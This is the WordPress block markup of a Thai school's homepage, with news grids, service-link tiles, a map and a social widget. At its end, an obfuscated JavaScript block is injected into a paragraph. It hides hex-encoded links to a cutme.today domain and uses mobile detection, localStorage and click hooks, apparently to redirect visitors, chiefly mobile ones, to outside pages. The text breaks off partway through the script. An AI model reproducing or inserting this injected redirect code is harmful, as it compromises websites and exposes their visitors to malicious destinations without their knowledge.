"pr\"}],\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingColor\":\"#ffffff\",\"headingHoverColor\":\"#000000\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingHoverColor\":\"#ffffff\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"y6fpy3h2\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"viewBgColor\":\"#27ccc105\",\"headingHoverColor\":\"#ffffff\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_bd7bab-81\",\"columns\":1,\"colLayout\":\"equal\",\"firstColumnWidth\":0,\"secondColumnWidth\":0,\"thirdColumnWidth\":0,\"fourthColumnWidth\":0,\"fifthColumnWidth\":0,\"sixthColumnWidth\":0,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_a02c00-db\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_a02c00-db\"><div class=\"kt-inside-inner-col\"><!-- wp:kadence/tabs {\"uniqueID\":\"14_8cac31-6c\",\"tabCount\":2,\"currentTab\":2,\"contentBgColor\":\"rgba(171,184,195,0.02)\",\"contentBorderStyles\":[{\"top\":[\"#bcbcbc\",\"\",1],\"right\":[\"#bcbcbc\",\"\",1],\"bottom\":[\"#bcbcbc\",\"\",1],\"left\":[\"#bcbcbc\",\"\",1],\"unit\":\"px\"}],\"tabAlignment\":\"center\",\"titles\":[{\"text\":\"E-SERVICE\",\"icon\":\"fe_box\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"เมนูระบบบริการ\",\"icon\":\"fe_airplay\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"}],\"titleColor\":\"#000000\",\"titleColorHover\":\"#f78da7\",\"titleColorActive\":\"#ff6900\",\"titleBg\":\"var(\\u002d\\u002dglobal-palette9, #ffffff)\",\"titleBgHover\":\"#ffffff\",\"titleBgActive\":\"#ffffff\",\"titleBorder\":\"#ffffff\",\"titleBorderHover\":\"#8ed1fc\",\"titleBorderActive\":\"#8ed1fc\",\"titleBorderWidth\":[1,1,0,1],\"titleBorderRadius\":[4,4,0,0],\"titlePadding\":[8,20,8,20],\"titleMargin\":[0,8,-1,0],\"size\":\"1.299\",\"sizeType\":\"em\",\"lineHeight\":1.4,\"lineType\":\"em\",\"tabSize\":\"\",\"mobileSize\":\"\",\"fontWeight\":\"400\",\"widthType\":\"percent\",\"tabWidth\":[3,\"\",\"\"],\"gutter\":[0,\"\",\"\"]} -->\n<div class=\"wp-block-kadence-tabs alignnone\"><div class=\"kt-tabs-wrap kt-tabs-id14_8cac31-6c kt-tabs-has-2-tabs kt-active-tab-2 kt-tabs-layout-tabs kt-tabs-tablet-layout-inherit kt-tabs-mobile-layout-inherit kt-tab-alignment-center \"><ul class=\"kt-tabs-title-list kb-tabs-list-columns kb-tab-title-columns-3\"><li id=\"tab-e-service\" class=\"kt-title-item kt-title-item-1 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-inactive\"><a href=\"#tab-e-service\" data-tab=\"1\" class=\"kt-tab-title kt-tab-title-1 \"><span data-name=\"fe_box\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">E-SERVICE</span></a></li><li id=\"tab-\" class=\"kt-title-item kt-title-item-2 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-active\"><a href=\"#tab-\" data-tab=\"2\" class=\"kt-tab-title kt-tab-title-2 \"><span data-name=\"fe_airplay\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">เมนูระบบบริการ</span></a></li></ul><div class=\"kt-tabs-content-wrap\"><!-- wp:kadence/tab {\"uniqueID\":\"48d9e9-20\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-1 kt-inner-tab48d9e9-20\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":723,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1623\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ย้าย.png\" alt=\"\" class=\"wp-image-723\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1608,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=563\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/comment.png\" alt=\"\" class=\"wp-image-1608\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1643,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"https://script.google.com/macros/s/AKfycbycBeyhT3IIhjxxhUEISZlk1PeiQ-TJMZ0qNb8vkV8RMj-segmqLGSYF7D700852852/exec\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/AQ.png\" alt=\"\" class=\"wp-image-1643\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":724,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=741\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ดูเกรด.png\" alt=\"\" class=\"wp-image-724\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1606,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"https://script.google.com/macros/s/AKfycbxEPByU7gv9jSnVVgZ9Epw9Zr5jO-O8WnCpXvsB67C6vI1y9u66n4BYnLjRvd9FT-si/exec\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/6.png\" alt=\"\" class=\"wp-image-1606\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":725,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ห้องประชุม.png\" alt=\"\" class=\"wp-image-725\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1604,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1611\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/5-1.png\" alt=\"\" class=\"wp-image-1604\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":2,\"uniqueID\":\"6fe435-37\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-2 kt-inner-tab6fe435-37\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":726,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://slp.ssk.in.th/slweb/\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/SLIP-SSK-1.webp\" alt=\"\" class=\"wp-image-726\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":729,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=748\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/2-1.png\" alt=\"\" class=\"wp-image-729\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1682,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1684\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/report.png\" alt=\"\" class=\"wp-image-1682\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":727,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/smss/index.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/smss-ssk1.webp\" alt=\"\" class=\"wp-image-727\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":808,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=810\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/คู่มือ.png\" alt=\"\" class=\"wp-image-808\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":730,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"https://pakheang.my.canva.site/docmentorderv2\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/5.png\" alt=\"\" class=\"wp-image-730\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":728,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/admss.webp\" alt=\"\" class=\"wp-image-728\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":731,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/6.png\" alt=\"\" class=\"wp-image-731\" style=\"width:150px\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1908,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"https://script.google.com/macros/s/AKfycbyfuu5DE6Sug1gTORaEw1XTMD3zj82GVkMIkPseb_e71HZWAqbrLMuADBmWcyARoaNa/exec\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/การลา-1.png\" alt=\"\" class=\"wp-image-1908\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab --></div></div></div>\n<!-- /wp:kadence/tabs -->\n\n<!-- wp:loginout /-->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"d3f1e2c8\",\"isDynamic\":true,\"blockVersion\":4} /--></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":3,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:paragraph {\"align\":\"center\",\"backgroundColor\":\"cyan-bluish-gray\",\"fontSize\":\"medium\"} -->\n<p class=\"has-text-align-center has-cyan-bluish-gray-background-color has-background has-medium-font-size\"><strong>แผนที่/ที่ตั้ง</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:image {\"id\":686,\"width\":\"auto\",\"height\":\"500px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Yellow-Clean-Contact-Us-Instagram-Post.png\" alt=\"\" class=\"wp-image-686\" style=\"aspect-ratio:1;object-fit:cover;width:auto;height:500px\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2F61565350226486%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n\n<!-- wp:shortcode -->\n[post-views]\n<!-- /wp:shortcode -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"fc945863\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v 